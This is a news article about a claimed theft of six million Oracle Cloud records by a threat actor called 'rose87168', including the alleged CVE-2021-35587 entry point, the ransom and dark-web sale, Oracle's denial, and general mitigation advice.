A threat actor operating under the alias “rose87168” has claimed responsibility for a significant data breach involving the theft of six million records from Oracle Cloud servers. The incident raises serious alarms about the security of cloud-based systems, indicating vulnerabilities that could compromise sensitive information globally.
The stolen data reportedly contains various sensitive elements, including Java Key Store (JKS) files, encrypted Single Sign-On (SSO) credentials, hashed passwords from the Lightweight Directory Access Protocol (LDAP), key files, and Java Platform Security (JPS) keys from Oracle’s Enterprise Manager. This breach is said to impact over 140,000 tenants worldwide, highlighting the extensive reach of the attack and the threats posed to organizations relying on Oracle’s cloud infrastructure.
According to the hacker, the exploitation was made possible by a vulnerability within Oracle Cloud’s login infrastructure, specifically at the endpoint formatted as login.(region-name).oraclecloud.com. This subdomain allegedly operated outdated versions of Oracle Fusion Middleware software, which may have been vulnerable due to the known CVE-2021-35587, a flaw related to Oracle Access Manager. This points to possible initial access tactics utilized in the attack, such as exploitation of public-facing applications, which are crucial in the MITRE ATT&CK Matrix.
The stolen records are reportedly being offered for sale on various dark web forums, including Breach Forums. “Rose87168” is reportedly demanding ransom from affected organizations, threatening to sell or expose the compromised data if demands are not met. Furthermore, the hacker is incentivizing others on these forums to assist in decrypting the stolen encrypted SSO and LDAP passwords, effectively leveraging social engineering tactics as part of their operational strategy.
In response to the claims, Oracle has firmly denied any breach in its cloud infrastructure. In a statement released on March 21, 2025, the company assured that customer data remained secure and distanced itself from the published credentials, stating they were not linked to its systems. Nevertheless, the incident underscores a growing trend in sophisticated cyberattacks targeting cloud services, wherein attackers display advanced techniques to orchestrate breaches effectively.
Organizations utilizing Oracle Cloud are advised to act swiftly to mitigate potential impacts. The existence of tools and protocols for managing credential security, strengthening access controls, and monitoring unusual system activities is critical in responding to such incidents. Moreover, conducting forensic investigations to scrutinize potential vulnerabilities and collaborating with Oracle for guidance on remediation efforts should be immediate priorities for these organizations.
The emergence of “rose87168” in January 2025 already reflects advanced methodologies in cyberattacks, asserting that access to the sensitive data was gained roughly 40 days prior to its online advertisement. This emphasizes the necessity for companies to maintain robust security postures, implement rigorous security protocols, and engage in continuous monitoring to tackle evolving cyber threats.
This breach serves as a stark reminder of the evolving landscape of cybersecurity challenges faced by businesses. As reliance on cloud services increases, the need for regular software patches, threat detection capabilities, and proactive defenses must be prioritized to safeguard against the complexities of cyber vulnerabilities.
